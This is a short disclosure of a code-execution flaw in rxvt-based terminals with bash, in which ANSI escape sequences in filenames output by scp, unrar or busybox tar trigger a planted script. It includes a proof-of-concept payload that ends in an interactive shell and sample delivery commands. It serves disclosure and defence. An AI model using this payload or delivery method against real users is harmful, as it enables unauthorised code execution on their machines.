(u)rxvt
terminal (+
bash
) remote
ish
code execution 0day
Version:
rxvt 2.7.10
,
rxvt-unicode 9.22
Author:
def <def@huumeet.info>
Date:
2021-04-20
CVE:
N/A
Prerequisites
rxvt
,
rxvt-unicode
,
mrxvt
or some other
rxvt
-based terminal
bash
shell. It is possible to target at least
ksh
as well, but
zsh
probably not
User interaction!
The victim must enter a command to run a program✱ that ...
plants attacker's payload file(s) in a subdirectory of the current directory
outputs text containing ANSI escape sequences which trigger the code execution
✱ Suitable programs include popular tools such as
scp
,
unrar
,
git-clone
...
Payload (planted as
ZZZ/0
,
ZZZ/1
and/or
ZZZ/Z0
in the PoC exploits)
#!/bin/sh
uname -a
&&
id
&&
date
&&
/bin/sh -i
scp -r exploit@server:/backup/ .
unrar x exploit.rar
busybox tar -xvf exploit.tar
Note:
GNU
tar
is
not
exploitable due to proper escaping of ANSI escape sequences in filenames!